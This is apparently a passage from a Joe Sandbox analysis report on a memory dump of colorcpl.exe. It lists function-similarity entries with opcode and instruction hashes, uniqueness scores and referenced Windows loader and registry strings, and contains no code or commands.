                                                                                                    • Opcode Fuzzy Hash: 82e07b0cd37fd4be1e8751ff8744121d4b03eaff4480c062a0548d474ac0ae67
                                                                                                    • Instruction Fuzzy Hash: 58917F756147429FD320CF24C880B9BB7E9EF88754F900B2DE5A6C72A0EB34E945CB56
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Log$RXACT
                                                                                                    • API String ID: 2994545307-2401810139
                                                                                                    • Opcode ID: c89c3121f905583ed56b9ff1bf60df7fcd7a336c772ae68274d10a80e33ee741
                                                                                                    • Instruction ID: dcc20e79178cb9fd097e5f99aa4f71893a6c22ea2f0582e18b9cf51c995ef476
                                                                                                    • Opcode Fuzzy Hash: c89c3121f905583ed56b9ff1bf60df7fcd7a336c772ae68274d10a80e33ee741
                                                                                                    • Instruction Fuzzy Hash: A97146B5509385AFD311CF64C880E6BBBEDFF88754F804A2AF59497220D731ED048B96
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 1E70BA44
                                                                                                    • RedirectedKey, xrefs: 1E70BA8E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                    • API String ID: 0-1388552009
                                                                                                    • Opcode ID: 63d07b2c5e198f572729029edea294d646418fea3e987585dd299e797b8b3ec9
                                                                                                    • Instruction ID: 069e4aa908bd7d045118fb938efa72d1830adba33529991b2b0c7ce9a4dd0004
                                                                                                    • Opcode Fuzzy Hash: 63d07b2c5e198f572729029edea294d646418fea3e987585dd299e797b8b3ec9
                                                                                                    • Instruction Fuzzy Hash: 3C61F575C0022DEBEB11DF95C888AEEBFB9FF09714F50416AE406A7214DB35AA45CF60
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$$
                                                                                                    • API String ID: 0-233714265
                                                                                                    • Opcode ID: 2d511efb4825419746551b55639356ce9a592fedca96828e6014352d8433030f
                                                                                                    • Instruction ID: bc6a0de382673f97997aa8ec32ece2b5b709c980dc2f57ae8bfd4757031acaa8
                                                                                                    • Opcode Fuzzy Hash: 2d511efb4825419746551b55639356ce9a592fedca96828e6014352d8433030f
                                                                                                    • Instruction Fuzzy Hash: AF61DE75E0178ADFDB20CFA4C588B9DB7B2FF08314FA05A29D515AB680CB34B981CB54
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 2a03949251ece645b27d92e37f06fefd97362f5f0f65b32486b964776283f065
                                                                                                    • Instruction ID: 05e2e85b19b1e707e0fb7dc6445c7599e9bfdd933901853d359f4a81efb86426
                                                                                                    • Opcode Fuzzy Hash: 2a03949251ece645b27d92e37f06fefd97362f5f0f65b32486b964776283f065
                                                                                                    • Instruction Fuzzy Hash: C5326770D002AADFDB21CF64C984BDDBBB1BB09305FA046EAD45DA7281D7746A84DF90
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _vswprintf_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 677850445-0
                                                                                                    • Opcode ID: 885b0d735b95200974fabfe3d45b3e610a8daeb0c833ab1497e59e00e42fd1e3
                                                                                                    • Instruction ID: e88449f05e7a19916499e578def6badd0f0527916ee75ff1e9b69e2d6b1e1b14
                                                                                                    • Opcode Fuzzy Hash: 885b0d735b95200974fabfe3d45b3e610a8daeb0c833ab1497e59e00e42fd1e3
                                                                                                    • Instruction Fuzzy Hash: 9661D175D103998EEB20CF64C844FAEBBB5EF16320F9043ADD899AB281D7755941CFA0
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E637932
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 885266447-0
                                                                                                    • Opcode ID: 07c6eaeab19b42d75ca3b607a3e5ab1245a67aee0822ddc89e908a07f1081892
                                                                                                    • Instruction ID: 1dd0ceb2723f0397edee848b2af72bbc506f46e4ff7c7197ae232911aa43c859
                                                                                                    • Opcode Fuzzy Hash: 07c6eaeab19b42d75ca3b607a3e5ab1245a67aee0822ddc89e908a07f1081892
                                                                                                    • Instruction Fuzzy Hash: 31515870A18382CFD310CF69C590A1BBBE6FB89710FA14A6EF59997354D734E944CB82
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03a70382ef979194e6a18fe0691506d0b0beee523617d30fbea88bdf74db8dca
                                                                                                    • Instruction ID: 01df17635d966e5af9e367c5a6ddbb3efd4dcb4554f7fae0fe134ed7abe486af
                                                                                                    • Opcode Fuzzy Hash: 03a70382ef979194e6a18fe0691506d0b0beee523617d30fbea88bdf74db8dca
                                                                                                    • Instruction Fuzzy Hash: 99416DB4D11299EFDB10CFA9C980AADBBF9FB49700F90866ED458E7211D730A941CF64
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578

                                                                                                    Strings
                                                                                                    • System Volume Information, xrefs: 1E6DDEBE
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: System Volume Information
                                                                                                    • API String ID: 2994545307-764423717

                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989

                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CWDIllegalInDLLSearch
                                                                                                    • API String ID: 0-473384322

                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989

                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializeProcess
                                                                                                    • API String ID: 0-2689506271

                                                                                                    Strings
                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E630058
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                    • API String ID: 0-996340685

                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Flst
                                                                                                    • API String ID: 0-2374792617

                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L4CwL4Cw
                                                                                                    • API String ID: 0-1654103815

                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 8990bef4a4e221cde88aa50ea925ab6ce86974a1ee3f0eefe7b8ed6151751f49
                                                                                                    • Instruction ID: 0fc912959176ed21d3db266d94acc65430a64bb57bd3b109635178d0dbbe309b
                                                                                                    • Opcode Fuzzy Hash: 8990bef4a4e221cde88aa50ea925ab6ce86974a1ee3f0eefe7b8ed6151751f49
                                                                                                    • Instruction Fuzzy Hash: 54812EB5E00349ABDB11DFA5CC94E9FBBBDEF49B10F500A29B615A7290DB70E900CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a68976729f5c169c2c591d8d466e275be043a451543eb67d35ccfe498a6cbed1
                                                                                                    • Instruction ID: fc880517a2427afdf05be77a82bd05ac6de75de39890bfe16e29a136dff78d5b
                                                                                                    • Opcode Fuzzy Hash: a68976729f5c169c2c591d8d466e275be043a451543eb67d35ccfe498a6cbed1
                                                                                                    • Instruction Fuzzy Hash: 2191E67190026D9FCB10CF64CC80BD9B3B5EF0A314F448AE5EA8AA7245D734AE91DF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                    • Instruction ID: 4d4060b2291a9537341d799e464af8f461b14e5a35909a1b307ec94bf195c109
                                                                                                    • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                    • Instruction Fuzzy Hash: 21818B74A00746EFCB15CF69C584B9ABBF5FF49700F50866AEA56C7281D730E981CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb8e329786ed3226362e7135d761cd9a0203bf70625460d6ab447a1872867629
                                                                                                    • Instruction ID: 44cb54aeadd8c7bf3708ba6435324f1fd8450211e8dc00c05bdf5880b6f5c46e
                                                                                                    • Opcode Fuzzy Hash: eb8e329786ed3226362e7135d761cd9a0203bf70625460d6ab447a1872867629
                                                                                                    • Instruction Fuzzy Hash: E661D230F01655DBDB05CEA9C8B0BBE77ABAF85310FA84729E811A7394DB30D941C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 643b246fbc27cfd5caff990afe1bb125586548c3544133d1d752a6ae4043fe28
                                                                                                    • Instruction ID: b4fecd46a8bea0a4d598be66e840602fc8ec2aa09cd9431d18afdf2d0655bb2a
                                                                                                    • Opcode Fuzzy Hash: 643b246fbc27cfd5caff990afe1bb125586548c3544133d1d752a6ae4043fe28
                                                                                                    • Instruction Fuzzy Hash: EC611431E1225AAFDB10CF68C860BAE73B6EF44714F904669E851EBAC0F778D941C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b453e2a542a727a47880bf9cde022b3139c440edf37ae600e7cf846494f4ba7c
                                                                                                    • Instruction ID: 2e63a164e2dcb34068d6fdc22df1e119e184c8aa0bb46585ce3372ea261a45ef
                                                                                                    • Opcode Fuzzy Hash: b453e2a542a727a47880bf9cde022b3139c440edf37ae600e7cf846494f4ba7c
                                                                                                    • Instruction Fuzzy Hash: F2719035E41265EFCB11DF98C880BADB7B6FF49710F914225E881AB250D730EC56CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a918266c555bc9c56286fd2653cabd174933d0401353a108cafa421f2824d6d4
                                                                                                    • Instruction ID: c2d97fbed297bfa0007ed942054f738ddb516d344884210bfec304fdc160d950
                                                                                                    • Opcode Fuzzy Hash: a918266c555bc9c56286fd2653cabd174933d0401353a108cafa421f2824d6d4
                                                                                                    • Instruction Fuzzy Hash: C251D531E00216DFDB08CF95C4916AEB7B6FF45312FA94769D80A9B25CE730A941CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a31dbe6dfc4a698525db9a51b4a24bef273a25ad16d597e5d43bb7450578d510
                                                                                                    • Instruction ID: 54101df3d3795385399e9fd7471b6c9e6438be8962fc64eea3424e5cef01bb58
                                                                                                    • Opcode Fuzzy Hash: a31dbe6dfc4a698525db9a51b4a24bef273a25ad16d597e5d43bb7450578d510
                                                                                                    • Instruction Fuzzy Hash: 0D517D716083429FD704DF28D854AAAB7E6FF89314F958A2DF495C7250E730EC09CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62ad84e35219e5a9bc8a8a1ae991dccca8fc5a249dbbe5d499c70fda0cb00df1
                                                                                                    • Instruction ID: 1fed1a5e29ee1e3b11e9cf676f276f0e4a6b36aa13a800978025a94505630f8f
                                                                                                    • Opcode Fuzzy Hash: 62ad84e35219e5a9bc8a8a1ae991dccca8fc5a249dbbe5d499c70fda0cb00df1
                                                                                                    • Instruction Fuzzy Hash: 8C616875E22656EFDB05CF68C540B8DBBF1BF89720F54862AE818AB351D734AD10CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                                                    • Instruction ID: 9b767d86abe4ff99f3621756a18f4753bf946e04e1ed628c490d5f2782736eb9
                                                                                                    • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                                                    • Instruction Fuzzy Hash: 4D515C395022C696CB0CCF55C894AFEB3B6BF41744BD0835EE8558BA85E731DD82C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47a91ac88072500062ad43a9040f6ef7bfb9efe20abde585450629f2451819cc
                                                                                                    • Instruction ID: cdc2ef6e9b8c76187473cb8e606383d472df17a46e9bb370f94aace5cabacd86
                                                                                                    • Opcode Fuzzy Hash: 47a91ac88072500062ad43a9040f6ef7bfb9efe20abde585450629f2451819cc
                                                                                                    • Instruction Fuzzy Hash: 3151CC78506382ABD3218F24C841F6ABBE8FF54710F900E2DE49987660E734F840CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9753cdc1167cd2a6f4b0c54e5efd4367c15a004b376de272da8817eb3c403daa
                                                                                                    • Instruction ID: 32b70ba6d31c148900896147f9ba6e3c03fd32c51655e4ab05e6f1835179fd89
                                                                                                    • Opcode Fuzzy Hash: 9753cdc1167cd2a6f4b0c54e5efd4367c15a004b376de272da8817eb3c403daa
                                                                                                    • Instruction Fuzzy Hash: 8C511075A51656AFC301CF68C4806ADBBB2FF45720FA08769E884DB740E734EA91CBC4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 389fb54456b3efe4ed5f525496ecf050ebde2f65efe6ce24bf3c6b148c4a960d
                                                                                                    • Instruction ID: 2437cc6bec653ddf606535ea6ce0af4688b2e1bb782fb8dc21b33a1b5dd3204d
                                                                                                    • Opcode Fuzzy Hash: 389fb54456b3efe4ed5f525496ecf050ebde2f65efe6ce24bf3c6b148c4a960d
                                                                                                    • Instruction Fuzzy Hash: 7D518A35B00A56AFEB05DF64C980B9ABBB6FF4A310F144665E905977A0DB70BD10CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                                    • Instruction ID: c9b64c9106a083f657375e160b0a43a80c80e1f5e43d5fe63f0584d50bbdf839
                                                                                                    • Opcode Fuzzy Hash: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                                    • Instruction Fuzzy Hash: 8C5127B5A00619AFCB00CF58C881A9ABBF5FF09354B298699E818DB351D335ED61CBD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea5783f37d6415028cf653ac5b6978d22a160581110b67bcef33c90d1936702f
                                                                                                    • Instruction ID: 23a09921259bfd869662c100a26ff4b68e8e64a0663c2c39cc3c1c38783781b4
                                                                                                    • Opcode Fuzzy Hash: ea5783f37d6415028cf653ac5b6978d22a160581110b67bcef33c90d1936702f
                                                                                                    • Instruction Fuzzy Hash: 5051BC79A01656CFCB04CFA8C590A9EFBF2BF49311F70862AD959A7344DB30AD40CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                                                    • Instruction ID: 8d39a7776e95cebc14e4738d3fd6c4b20f6cb4d310e5501fce197699d36b96b9
                                                                                                    • Opcode Fuzzy Hash: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                                                    • Instruction Fuzzy Hash: B241E131A00746EFEB04DE59C850B7AB3EAFF85750FD2866AE8909B211DBB0DD048790
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6fa8d8b043a67a1cf1f64c9dcc76c7551672d76ce2b24fd86b889368b8ce5df3
                                                                                                    • Instruction ID: 386f61ae6647e87f47226b11fa3b3024d97b19b193bb3954d67713dad63a174b
                                                                                                    • Opcode Fuzzy Hash: 6fa8d8b043a67a1cf1f64c9dcc76c7551672d76ce2b24fd86b889368b8ce5df3
                                                                                                    • Instruction Fuzzy Hash: 5E31AFB1201642DFD728CF54C890A5AB7BAFFA5708BE08A2ED0598B751D771F841CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f0a3af76ddd6a91b9ba05fe908646bec8ce4ec01d5b5fcfa6571d6f896ff914
                                                                                                    • Instruction ID: f0f0d14f7a416e998da898e93bb8f19f96c1d772ab46292c18d6b0e7ca4afd28
                                                                                                    • Opcode Fuzzy Hash: 6f0a3af76ddd6a91b9ba05fe908646bec8ce4ec01d5b5fcfa6571d6f896ff914
                                                                                                    • Instruction Fuzzy Hash: B4313871A00189EFDF068F99CC909AEBBB6FF49384F914569FA45A7210C339EA50DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5e83ac62f9b19783e513c68975baacdd8c119e376795f8a3421988f79caf789
                                                                                                    • Instruction ID: 2a510099407f9c954e82aa8cf83caf2b4bfeee4cc8b47a015543a33c498fa6df
                                                                                                    • Opcode Fuzzy Hash: d5e83ac62f9b19783e513c68975baacdd8c119e376795f8a3421988f79caf789
                                                                                                    • Instruction Fuzzy Hash: 61316FB1914253DFE311CB18C9C1B6977E9EB8D760F900719E14ADB290FB71AA81CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                    • Instruction ID: 2cdec028ab12406a7db33aaa82ca32af3ace4d4bb5382f5fecce1d219496a2af
                                                                                                    • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                    • Instruction Fuzzy Hash: 5231BF76A01246AFDF118E54C890F5A7BBAEB95750FE68638AD049B250D338DD40CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40a55acd242a14859fef7661f3c4825b3016a1dc0310fc01f6871aa5412c2d06
                                                                                                    • Instruction ID: 142ad15ffd191c93976ac31c68b655eca9772ef0764d21a79235c1f0347f4afc
                                                                                                    • Opcode Fuzzy Hash: 40a55acd242a14859fef7661f3c4825b3016a1dc0310fc01f6871aa5412c2d06
                                                                                                    • Instruction Fuzzy Hash: D6312B71A11165EBCB01DF65CC41ABFB7B9FF48700B840669F902EB250E734AE10CB65
                                                                                                    Uniqueness

